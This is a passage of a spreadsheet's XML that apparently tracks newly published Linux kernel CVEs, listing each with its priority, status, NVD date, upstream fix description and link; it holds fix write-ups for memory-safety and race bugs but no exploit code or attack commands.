          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92522</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B852" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92523</t>
        </is>
      </c>
      <c r="D852" s="5" t="inlineStr"/>
      <c r="E852" s="5" t="inlineStr"/>
      <c r="F852" s="5" t="inlineStr"/>
      <c r="G852" s="5" t="inlineStr"/>
      <c r="H852" s="5" t="inlineStr"/>
      <c r="I852" s="5" t="inlineStr"/>
      <c r="J852" s="5" t="inlineStr"/>
      <c r="K852" s="5" t="inlineStr"/>
      <c r="L852" s="5" t="inlineStr"/>
      <c r="M852" s="5" t="inlineStr"/>
      <c r="N852" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O852" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P852" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q852" s="5" t="inlineStr"/>
      <c r="R852" s="5" t="inlineStr"/>
      <c r="S852" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/nldev: validate dynamic counter attribute length
RDMA_NLDEV_ATTR_STAT_HWCOUNTERS is a nested attribute whose children are
consumed directly with nla_get_u32(). The top-level policy validates only
the container, so it does not establish the fixed shape of each child.
Require every child payload to be exactly one u32 before reading it.</t>
        </is>
      </c>
      <c r="T852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92523</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B853" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92524</t>
        </is>
      </c>
      <c r="D853" s="5" t="inlineStr"/>
      <c r="E853" s="5" t="inlineStr"/>
      <c r="F853" s="5" t="inlineStr"/>
      <c r="G853" s="5" t="inlineStr"/>
      <c r="H853" s="5" t="inlineStr"/>
      <c r="I853" s="5" t="inlineStr"/>
      <c r="J853" s="5" t="inlineStr"/>
      <c r="K853" s="5" t="inlineStr"/>
      <c r="L853" s="5" t="inlineStr"/>
      <c r="M853" s="5" t="inlineStr"/>
      <c r="N853" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O853" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P853" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q853" s="5" t="inlineStr"/>
      <c r="R853" s="5" t="inlineStr"/>
      <c r="S853" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
irqchip/gic-v3-its: Prevent leak in its_vpe_irq_domain_alloc()
When its_irq_gic_domain_alloc() fails, the following
its_vpe_irq_domain_free() fails to invoke its_vep_teardown() for the
corresponding interrupt, which leaks the resource.
Invoke its_vpe_teardown() in the error handling path to avoid the leak.
[ tglx: Massaged change log ]</t>
        </is>
      </c>
      <c r="T853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92524</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B854" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92525</t>
        </is>
      </c>
      <c r="D854" s="5" t="inlineStr"/>
      <c r="E854" s="5" t="inlineStr"/>
      <c r="F854" s="5" t="inlineStr"/>
      <c r="G854" s="5" t="inlineStr"/>
      <c r="H854" s="5" t="inlineStr"/>
      <c r="I854" s="5" t="inlineStr"/>
      <c r="J854" s="5" t="inlineStr"/>
      <c r="K854" s="5" t="inlineStr"/>
      <c r="L854" s="5" t="inlineStr"/>
      <c r="M854" s="5" t="inlineStr"/>
      <c r="N854" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O854" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P854" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q854" s="5" t="inlineStr"/>
      <c r="R854" s="5" t="inlineStr"/>
      <c r="S854" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/rxe: Validate num_sge/cur_sge before indexing wqe-&gt;dma.sge[]
For a user QP, qp-&gt;sq.queue is a ring the application writes directly,
so rxe_post_send() takes the is_user branch and only schedules send_task
without validating the WQE. rxe_requester() consumes it in place via
req_next_wqe() and calls copy_data(), which indexes
&amp;wqe-&gt;dma.sge[cur_sge] with the attacker-controlled num_sge/cur_sge.
Only the kernel path bounds num_sge (validate_send_wr()); the user WQE
is never checked, so a local unprivileged user can post a WQE with an
out-of-range cur_sge or oversized num_sge and force an out-of-bounds
read of the per-WQE sge array in copy_data() (vmalloc OOB read, local
DoS).
Bound num_sge to qp-&gt;sq.max_sge in rxe_requester() before use, the way
get_srq_wqe() already guards SRQ entries, and bound cur_sge only when
the WQE carries payload (dma.resid): copy_data() returns early on a
zero-length copy before touching dma-&gt;sge[], so a zero-payload WQE --
the only kind a max_sge == 0 QP can post -- stays valid.
Reproduced under KASAN; the vmalloc-out-of-bounds in copy_data() is gone.</t>
        </is>
      </c>
      <c r="T854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92525</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B855" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93037</t>
        </is>
      </c>
      <c r="D855" s="5" t="inlineStr"/>
      <c r="E855" s="5" t="inlineStr"/>
      <c r="F855" s="5" t="inlineStr"/>
      <c r="G855" s="5" t="inlineStr"/>
      <c r="H855" s="5" t="inlineStr"/>
      <c r="I855" s="5" t="inlineStr"/>
      <c r="J855" s="5" t="inlineStr"/>
      <c r="K855" s="5" t="inlineStr"/>
      <c r="L855" s="5" t="inlineStr"/>
      <c r="M855" s="5" t="inlineStr"/>
      <c r="N855" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O855" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P855" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q855" s="5" t="inlineStr"/>
      <c r="R855" s="5" t="inlineStr"/>
      <c r="S855" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/hfi1: Propagate sdma_txinit_ahg() errors
set_txreq_header_ahg() ignores the return value of sdma_txinit_ahg().
If sdma_txinit_ahg() fails, it returns before initializing tx-&gt;txreq.
However, set_txreq_header_ahg() ignores the error and returns the AHG
change count, causing the caller to continue processing the request as
though initialization had succeeded.
Propagate sdma_txinit_ahg() failures to the caller and abort request
processing when initialization fails.
Found by Linux Verification Center (linuxtesting.org) with SVACE.</t>
        </is>
      </c>
      <c r="T855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93037</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B856" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93038</t>
        </is>
      </c>
      <c r="D856" s="5" t="inlineStr"/>
      <c r="E856" s="5" t="inlineStr"/>
      <c r="F856" s="5" t="inlineStr"/>
      <c r="G856" s="5" t="inlineStr"/>
      <c r="H856" s="5" t="inlineStr"/>
      <c r="I856" s="5" t="inlineStr"/>
      <c r="J856" s="5" t="inlineStr"/>
      <c r="K856" s="5" t="inlineStr"/>
      <c r="L856" s="5" t="inlineStr"/>
      <c r="M856" s="5" t="inlineStr"/>
      <c r="N856" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O856" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P856" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q856" s="5" t="inlineStr"/>
      <c r="R856" s="5" t="inlineStr"/>
      <c r="S856" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: dac: ad5686: missing NULL check on match data
Verify that chip_info pointer is not NULL. If a user binds the driver
using driver_override via sysfs with a device name not present in the
id_table or of_match_table, match data will be NULL.</t>
        </is>
      </c>
      <c r="T856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93038</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B857" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93039</t>
        </is>
      </c>
      <c r="D857" s="5" t="inlineStr"/>
      <c r="E857" s="5" t="inlineStr"/>
      <c r="F857" s="5" t="inlineStr"/>
      <c r="G857" s="5" t="inlineStr"/>
      <c r="H857" s="5" t="inlineStr"/>
      <c r="I857" s="5" t="inlineStr"/>
      <c r="J857" s="5" t="inlineStr"/>
      <c r="K857" s="5" t="inlineStr"/>
      <c r="L857" s="5" t="inlineStr"/>
      <c r="M857" s="5" t="inlineStr"/>
      <c r="N857" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O857" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P857" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q857" s="5" t="inlineStr"/>
      <c r="R857" s="5" t="inlineStr"/>
      <c r="S857" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: meson: Keep link pointers valid on realloc failure
meson_card_reallocate_links() grows the DAI link and private data
arrays with two consecutive krealloc() calls and updates the owner
pointers only after both calls have succeeded.
A successful krealloc() may move the data: it frees the old block and
returns a new one. When that happens for the link array and the second
krealloc() then fails, card-&gt;dai_link still points to the block that
krealloc() already freed, and the error path frees the new block too.
The probe error path then calls meson_card_clean_references(), which
dereferences card-&gt;dai_link and kfree()s it again, resulting in a
use-after-free and a double free.
Commit card-&gt;dai_link and card-&gt;num_links right after the first
krealloc() succeeds, so the pointer always refers to a valid allocation
that meson_card_clean_references() can walk and free. krealloc() with
__GFP_ZERO zero-initializes the added entries, so walking them on the
error path is safe. With both failure paths reduced to a plain return,
drop the goto labels and the error message.</t>
        </is>
      </c>
      <c r="T857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93039</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B858" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93040</t>
        </is>
      </c>
      <c r="D858" s="5" t="inlineStr"/>
      <c r="E858" s="5" t="inlineStr"/>
      <c r="F858" s="5" t="inlineStr"/>
      <c r="G858" s="5" t="inlineStr"/>
      <c r="H858" s="5" t="inlineStr"/>
      <c r="I858" s="5" t="inlineStr"/>
      <c r="J858" s="5" t="inlineStr"/>
      <c r="K858" s="5" t="inlineStr"/>
      <c r="L858" s="5" t="inlineStr"/>
      <c r="M858" s="5" t="inlineStr"/>
      <c r="N858" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O858" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P858" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q858" s="5" t="inlineStr"/>
      <c r="R858" s="5" t="inlineStr"/>
      <c r="S858" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: dw-edma: Serialize channel state checks
pause() and resume() read and update channel state without holding vc.lock,
while the interrupt handlers update the same state under it. Take the same
lock around those state checks so that request, status, and configured stay
consistent.
For example, pause() can observe EDMA_ST_BUSY right before the interrupt
handler completes the final descriptor and moves the channel to
EDMA_ST_IDLE, and then record EDMA_REQ_PAUSE on an already idle channel. No
further interrupt will acknowledge the request, and since issue_pending()
requires EDMA_REQ_NONE, the channel is wedged for good: terminate_all()
leaves the stale request behind, so even reconfiguring the channel does not
recover it.
issue_pending() already runs under vc.lock, but it tests configured before
taking it. Move that test under the lock as well, so configured, request,
and status are evaluated as one channel-state snapshot.</t>
        </is>
      </c>
      <c r="T858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93040</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B859" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93041</t>
        </is>
      </c>
      <c r="D859" s="5" t="inlineStr"/>
      <c r="E859" s="5" t="inlineStr"/>
      <c r="F859" s="5" t="inlineStr"/>
      <c r="G859" s="5" t="inlineStr"/>
      <c r="H859" s="5" t="inlineStr"/>
      <c r="I859" s="5" t="inlineStr"/>
      <c r="J859" s="5" t="inlineStr"/>
      <c r="K859" s="5" t="inlineStr"/>
      <c r="L859" s="5" t="inlineStr"/>
      <c r="M859" s="5" t="inlineStr"/>
      <c r="N859" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O859" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P859" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q859" s="5" t="inlineStr"/>
      <c r="R859" s="5" t="inlineStr"/>
      <c r="S859" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: dw-edma: Serialize abort state updates
dw_edma_abort_interrupt() drops vc.lock before changing request and
status. issue_pending() can acquire the lock in that small window,
observe the old busy state, and skip starting queued descriptors. Then
the abort handler overwrites the channel status as idle, leaving the new
descriptors stranded for good.
Keep descriptor completion and the state transition in the same critical
section.</t>
        </is>
      </c>
      <c r="T859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93041</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B860" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93042</t>
        </is>
      </c>
      <c r="D860" s="5" t="inlineStr"/>
      <c r="E860" s="5" t="inlineStr"/>
      <c r="F860" s="5" t="inlineStr"/>
      <c r="G860" s="5" t="inlineStr"/>
      <c r="H860" s="5" t="inlineStr"/>
      <c r="I860" s="5" t="inlineStr"/>
      <c r="J860" s="5" t="inlineStr"/>
      <c r="K860" s="5" t="inlineStr"/>
      <c r="L860" s="5" t="inlineStr"/>
      <c r="M860" s="5" t="inlineStr"/>
      <c r="N860" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O860" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P860" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q860" s="5" t="inlineStr"/>
      <c r="R860" s="5" t="inlineStr"/>
      <c r="S860" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: dw-edma: Terminate all descriptors without callbacks
The DMA Engine client documentation says in the "Terminate APIs" section
of Documentation/driver-api/dmaengine/client.rst:
"No callback functions will be called for any incomplete transfers."
dw-edma instead calls vchan_cookie_complete() when a deferred STOP reaches
the interrupt handler. This schedules a callback for the active descriptor
and leaves other issued or submitted descriptors queued. A late callback
after dmaengine_terminate_sync() can dereference client state that has
already been freed, while leftover descriptors may later restart into
reused buffers or leak.
Move all issued and submitted descriptors to the terminated list whenever
termination completes. For a pending STOP, do this from both the DONE and
ABORT paths. Complete their cookies in order without scheduling callbacks.
A STOP can remain pending until the running transfer raises an
interrupt. Make device_synchronize() wait for such a pending STOP to
complete before releasing terminated descriptors. Reuse it from
free_chan_resources(), then release the remaining virt-dma resources.
Sleep instead of busy-polling while waiting, and warn if the existing
timeout expires.</t>
        </is>
      </c>
      <c r="T860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93042</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B861" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93043</t>
        </is>
      </c>
      <c r="D861" s="5" t="inlineStr"/>
      <c r="E861" s="5" t="inlineStr"/>
      <c r="F861" s="5" t="inlineStr"/>
      <c r="G861" s="5" t="inlineStr"/>
      <c r="H861" s="5" t="inlineStr"/>
      <c r="I861" s="5" t="inlineStr"/>
      <c r="J861" s="5" t="inlineStr"/>
      <c r="K861" s="5" t="inlineStr"/>
      <c r="L861" s="5" t="inlineStr"/>
      <c r="M861" s="5" t="inlineStr"/>
      <c r="N861" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O861" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P861" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q861" s="5" t="inlineStr"/>
      <c r="R861" s="5" t="inlineStr"/>
      <c r="S861" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Disallow interpreter fallback for gotox insn
The interpreter does not recognize the BPF_JMP|BPF_JA|BPF_X insn, which
is used for insn_array map. Thereafter, it would hit the BUG_ON() in
___bpf_prog_run() at run time.
[    2.563726] BPF interpreter: unknown opcode 0d (imm: 0x0)
[    2.564557] ------------[ cut here ]------------
[    2.565206] kernel BUG at kernel/bpf/core.c:2349!
[    2.565882] Oops: invalid opcode: 0000 [#1] SMP PTI
Set jit_required as true when insn_array map is used in the prog in
order to disallow interpreter fallback for gotox insn in
core.c::__bpf_prog_select_runtime().</t>
        </is>
      </c>
      <c r="T861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93043</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B862" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93044</t>
        </is>
      </c>
      <c r="D862" s="5" t="inlineStr"/>
      <c r="E862" s="5" t="inlineStr"/>
      <c r="F862" s="5" t="inlineStr"/>
      <c r="G862" s="5" t="inlineStr"/>
      <c r="H862" s="5" t="inlineStr"/>
      <c r="I862" s="5" t="inlineStr"/>
      <c r="J862" s="5" t="inlineStr"/>
      <c r="K862" s="5" t="inlineStr"/>
      <c r="L862" s="5" t="inlineStr"/>
      <c r="M862" s="5" t="inlineStr"/>
      <c r="N862" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O862" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P862" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q862" s="5" t="inlineStr"/>
      <c r="R862" s="5" t="inlineStr"/>
      <c r="S862" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Disallow interpreter fallback for arena-related insns
Since the interpreter does not support the arena-related insns,
interpreter fallback should not be allowed for these insns in
core.c::__bpf_prog_select_runtime().
Currently, when the interpreter executes the arena ST/LDX/STX insns,
it would hit the BUG_ON() in ___bpf_prog_run() at run time.
[    2.579196] BPF interpreter: unknown opcode a2 (imm: 0x0)
[    2.579998] ------------[ cut here ]------------
[    2.580652] kernel BUG at kernel/bpf/core.c:2349!
[    2.581314] Oops: invalid opcode: 0000 [#1] SMP PTI
Set jit_required as true when arena map is used in the prog to disallow
interpreter fallback for arena-related insns.</t>
        </is>
      </c>
      <c r="T862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93044</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B863" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93045</t>
        </is>
      </c>
      <c r="D863" s="5" t="inlineStr"/>
      <c r="E863" s="5" t="inlineStr"/>
      <c r="F863" s="5" t="inlineStr"/>
      <c r="G863" s="5" t="inlineStr"/>
      <c r="H863" s="5" t="inlineStr"/>
      <c r="I863" s="5" t="inlineStr"/>
      <c r="J863" s="5" t="inlineStr"/>
      <c r="K863" s="5" t="inlineStr"/>
      <c r="L863" s="5" t="inlineStr"/>
      <c r="M863" s="5" t="inlineStr"/>
      <c r="N863" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O863" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P863" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q863" s="5" t="inlineStr"/>
      <c r="R863" s="5" t="inlineStr"/>
      <c r="S863" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject arena frees below the arena base
bpf_arena_free_pages() accepts scalar arena addresses. The runtime
masks the address to the low 32 bits and reconstructs a full user
address from the arena base before returning the range to the arena
free tree.
When the scalar value is below the low 32 bits of the arena base,
full_uaddr falls below user_vm_start. The existing upper-end clipping
then turns this into an out-of-range free-tree offset. A later
allocation can reuse that offset and return an address below the arena
mapping.
Reject such frees before computing the clipped range.</t>
        </is>
      </c>
      <c r="T863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93045</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B864" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93046</t>
        </is>
      </c>
      <c r="D864" s="5" t="inlineStr"/>
      <c r="E864" s="5" t="inlineStr"/>
      <c r="F864" s="5" t="inlineStr"/>
      <c r="G864" s="5" t="inlineStr"/>
      <c r="H864" s="5" t="inlineStr"/>
      <c r="I864" s="5" t="inlineStr"/>
      <c r="J864" s="5" t="inlineStr"/>
      <c r="K864" s="5" t="inlineStr"/>
      <c r="L864" s="5" t="inlineStr"/>
      <c r="M864" s="5" t="inlineStr"/>
      <c r="N864" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O864" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P864" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q864" s="5" t="inlineStr"/>
      <c r="R864" s="5" t="inlineStr"/>
      <c r="S864" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
software node: Fix software_node_get_reference_args() with index -1
The bounds check for the index passed to
software_node_get_reference_args() was failing when passed UINT_MAX,
this in turn would lead to an out of bound access in the property
array. Fix the bound check to also cover the UINT_MAX case.</t>
        </is>
      </c>
      <c r="T864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93046</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B865" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93047</t>
        </is>
      </c>
      <c r="D865" s="5" t="inlineStr"/>
      <c r="E865" s="5" t="inlineStr"/>
      <c r="F865" s="5" t="inlineStr"/>
      <c r="G865" s="5" t="inlineStr"/>
      <c r="H865" s="5" t="inlineStr"/>
      <c r="I865" s="5" t="inlineStr"/>
      <c r="J865" s="5" t="inlineStr"/>
      <c r="K865" s="5" t="inlineStr"/>
      <c r="L865" s="5" t="inlineStr"/>
      <c r="M865" s="5" t="inlineStr"/>
      <c r="N865" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O865" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P865" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q865" s="5" t="inlineStr"/>
      <c r="R865" s="5" t="inlineStr"/>
      <c r="S865" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/v3d: Associate BOs with every job that accesses them
A submission can expand into a chain of jobs (e.g. bin + render + cache
clean). Implicit synchronization in v3d_submit_lock_reservations() is gated
on each job's bo[], but the BO list was only ever attached to the last job
of the chain. When that last job is a trailing CACHE_CLEAN job, the job
that actually consumes the BOs (that is, a RENDER or CSD job) was left with
bo_count == 0 and picked up no implicit dependencies. It could therefore
be dispatched to the hardware and read a BO while another context was still
writing it, leading to data corruption.
Attach the BOs to the job that consumes them, so (1) it acquires the
correct implicit dependencies during reservation locking and (2) they are
kept mapped until the end of the submission. Give it references to all
consuming job's BOs through v3d_job_reference_bos() instead of looking the
handles up a second time; that avoids a redundant lookup and guarantees
both jobs reference the exact same objects.
As the CACHE_CLEAN job now carries a BO array as well, add a per-job
`has_implicit_dep` flag so that only the consuming jobs take implicit
dependencies. The CACHE_CLEAN job (a global flush) and the BIN job (binning
waiting on another context is not a realistic scenario) are excluded.</t>
        </is>
      </c>
      <c r="T865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93047</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B866" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93048</t>
        </is>
      </c>
      <c r="D866" s="5" t="inlineStr"/>
      <c r="E866" s="5" t="inlineStr"/>
      <c r="F866" s="5" t="inlineStr"/>
      <c r="G866" s="5" t="inlineStr"/>
      <c r="H866" s="5" t="inlineStr"/>
      <c r="I866" s="5" t="inlineStr"/>
      <c r="J866" s="5" t="inlineStr"/>
      <c r="K866" s="5" t="inlineStr"/>
      <c r="L866" s="5" t="inlineStr"/>
      <c r="M866" s="5" t="inlineStr"/>
      <c r="N866" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O866" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P866" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q866" s="5" t="inlineStr"/>
      <c r="R866" s="5" t="inlineStr"/>
      <c r="S866" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mtd: part: reject MTDPART_OFS_RETAIN in mtd_add_partition()
mtd_add_partition() does not reject the special offset value
MTDPART_OFS_RETAIN (-3), which leads to a WARN_ON in
add_mtd_device() when called through the BLKPG ioctl on NAND
devices. The RETAIN value depends on cur_offset being the end of
the previous partition, but in the dynamic partition path
cur_offset equals the offset argument itself, causing undefined
behavior.
Commit 5daa7b21496a ("mtd: prepare partition add and del functions
for ioctl requests") introduced mtd_add_partition() and correctly
rejected MTDPART_OFS_APPEND (-1) and MTDPART_OFS_NXTBLK (-2),
since those special offsets rely on cur_offset tracking the
previous partition's end. However, commit 1a31368bf92e ("mtd: add a flags
for partitions which should just leave smth. after them")
later added MTDPART_OFS_RETAIN (-3) for the static
partition table path without updating mtd_add_partition() to
also reject this value.
With offset=-3 passed via BLKPG, the RETAIN size calculation in
